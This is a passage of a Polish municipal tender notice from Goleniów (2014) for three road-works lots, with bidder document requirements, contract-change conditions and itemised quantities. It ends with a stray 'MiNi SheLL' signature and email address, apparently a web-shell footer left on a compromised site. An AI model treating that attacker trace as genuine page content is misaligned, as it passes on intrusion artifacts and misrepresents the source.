c)	wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - sporządzony zgodnie z załącznikiem nr 8.3. do SIWZ
d)	jeżeli Wykonawca ma zamiar zlecić wykonanie części robót podwykonawcy to musi wypełnić          i załączyć do oferty załącznik nr 9 do SIWZ (jeżeli dotyczy),
e)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;                   (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
f)	pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik,
g)	kosztorys ofertowy (brak kosztorysu ofertowego złożonego zgodnie z zapisami SIWZ spowoduje odrzucenie oferty).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.

1. Zmiana terminu realizacji przedmiotu umowy  

1.1. Zmiany spowodowane warunkami atmosferycznymi, w szczególności:
a)	klęski żywiołowe,
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów.

1.2. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,                                w szczególności:
a)	wstrzymanie robót przez Zamawiającego,
b)	konieczność realizacji zamówień dodatkowych,
c)	potrzeba realizacji zamówień uzupełniających ,
d)	konieczność realizacji zamówień zamiennych.

1.3. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac.




1.4. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1.1. - 
1.3. termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 


2. Zmiana sposobu spełnienia świadczenia

2.1. Zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.

Każda z powyższych zmian może być powiązana z obniżeniem jak i zwiększeniem wynagrodzenia na zasadach określonych w formie pisemnej przez Strony umowy. 


2.2. Pozostałe dopuszczalne zmiany postanowień zawartej umowy 
a)	zmiana obowiązującej stawki VAT:
-	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
-	jeśli  zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
c)	niezbędne zmiany umowy konieczne do wprowadzenia z uwagi na kolizję                                    z nie przewidywanymi, nieplanowanymi na dzień zawarcia umowy a niezbędnymi do wykonania pracami prowadzonymi przez inne podmioty.  
d)	Zmiana podwykonawcy po uprzedniej zgodzie zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Plac Lotników 1, 72-100 Goleniów, pok.212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2014 godzina 09:45, miejsce: Urząd Gminy i Miasta Plac Lotników 1, 72-100 Goleniów, pok.212.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa przejścia dla pieszych przy ul. Barnima w Goleniowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach części I zamówienia zakres dotyczy budowy przejścia dla pieszych przy ul. Barnima w Goleniowie i obejmuje:
1)	Roboty pomiarowe 0,04 km,
2)	Rozebranie ręczne podbudowy z gruntu stabilizowanego o grubości 10cm -30,50 m2,
3)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 3,00 m3,
4)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km  3,00 m3,
5)	Rozbiórka podbudowy z brukowca gr. 15cm z wywozem i utylizacją 92,00 m2,
6)	Rozebranie mechaniczne nawierzchni z tłucznia kamiennego na podbudowie o grubości 15cm 92,00 m2,
7)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 14,00 m3,
8)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km  14,00 m3, 
9)	Rozbiórka nawierzchni bitumicznej z wywozem i utylizacją 92  m2,
10)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 14 m3,
11)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km  14,00 m3
12)	Rozebranie krawężników betonowych o wymiarach 20x30cm, na podsypce cementowo-piaskowej  41,00 m,
13)	Rozebranie ław z betonu pod krawężniki 3,4 m3,
14)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 5,68 m3,
15)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1 km - dodatkowe 4 km  5,68 m3,
16)	 Rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych o wymiarach 50x50x7cm na podsypce cementowo-piaskowej 30,5 m2,
17)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego  2,14 m3,
18)	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości - dodatkowe 4km 2,14 m3,
19)	Zdjęcie tarcz (tablic) znaków drogowych z wywozem 5 szt.,
20)	Rozebranie słupków do znaków 3 szt.,
21)	 Wywóz złomu z terenu rozbiórki samochodem skrzyniowym na odległość do 1km z załadunkiem i wyładunkiem ręcznym - ujęto wywóz słupków i tarcz 0,09 t
22)	Roboty ziemne w gruncie kategorii I-II wykonywane ładowarkami gąsienicowymi o pojemności łyżki 1,00m3 z transportem urobku samochodami samowyładowczymi 5-10t na odległość do 1km 10 m3,
23)	Formowanie i zagęszczanie spycharkami nasypów z gruntu kategorii III-IV o wysokości do 3 m. (Spycharka gąsienicowa 74kW (100KM) 10 m3
24)	Regulacja pionowa włazów kanałowych 2 szt.,
25)	Wykonanie platformy roboczej grubości 15cm ze stabilizacji gruntu cementem Rm=2,5Mpa -109 m2,
26)	Podbudowy z gruntu stabilizowanego cementem o grubości po zagęszczeniu 12cm
wykonywane sprzętem mechanicznym rolniczym 109,00 m2,
27)	Podbudowy z gruntu stabilizowanego cementem wykonywane sprzętem mechanicznym rolniczym - za każdy dalszy 1cm - dodatkowe 3 cm- 109 m2,
28)	Humusowanie skarp warstwą humusu grubości 5cm z obsianiem 15,50 m2,
29)	Materiałami cienkowarstwowymi - linie ciągłe 4,30 m2,  
30)	Oznakowanie poziome jezdni farbą: linie segregacyjne i krawędziowe przerywane malowane mechanicznie  2,3 m2,
31)	Oznakowanie poziome jezdni farbą: linie na skrzyżowaniach i przejściach dla pieszych malowane mechanicznie 28,2 m2,
32)	 Słupki do znaków drogowych z rur stalowych 7,00 szt.,
33)	Przymocowanie znaków zakazu, nakazu, ostrzegawczych i informacyjnych o powierzchni do 0,3m2  9,0 szt.,
34)	Ustawienie krawężników betonowych 15x30 na podsypce cementowo piaskowej 47,00 m,
35)	Chodniki z kostki brukowej betonowej prostokątnej 20x10cm o grubości 8 cm na podsypce cementowo-piaskowej  100,00 m2,
36)	Chodniki z kostki brukowej betonowej prostokątnej 20x10cm o grubości 8 cm na podsypce cementowo-piaskowej 7,00 m2,
37)	Obrzeża betonowe o wymiarach 30x8cm na ławie betonowej C12/15, z wypełnieniem spoin zaprawą cementową  9,50 m..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa parkingu przy ul. Kilińskiego w Goleniowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach części II zamówienia zakres dotyczy budowy parkingu przy ul. Kilińskiego w Goleniowie obejmuje:

1)	Wykonanie koryta gł. 30 cm - 100 m2,
2)	Wywóz ziemi z budowy 30 m3, 
3)	Profilowanie i zagęszczanie podłoża  100 m2,
4)	Ustawienie krawężnika betonowego  o wym. 15x30 30m,
5)	Wykonanie podbudowy  z kruszywa łamanego  gr 20 cm -100 m2,
6)	Nawierzchnia z kostki betonowej gr 8 cm na podsypce cem.-piaskowej 100m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont chodnika ul. Zielona Droga w Goleniowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach części III zamówienia zakres remontu chodnika ul. Zielona Droga w Goleniowie

1)	Rozebranie chodników  z płytek 35x35 i 50x50 - 360 m2,
2)	Rozebranie trylinki -25 m2,
3)	Rozebranie krawężników betonowych -125 m,
4)	Ręczne rozebranie nawierzchni z kostki z kostki bet. - 50 m2,
5)	Wykonanie koryta  gł. 20 cm - 100 m2,
6)	Wywiezienie gruzu -94,58 m3,
7)	Wykonanie nawierzchni z kostki betonowej gr 8 cm na podsypce cem-piaskowej - 440 m2,
8)	Regulacja pionowa studni - 3 szt.,
9)	Regulacja pionowa studzienek dla zaworów - 2 szt., 
10)	Podbudowa z kruszywa łamanego gr. 20 cm  - 25 m2,
11)	Ustawienie krawężników betonowych  -120 m,
12)	Ustawienie obrzeży betonowych -28 m,
13)	Ręczne planowanie gruntu - 70 m2,
14)	Wykonanie trawników - 70 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com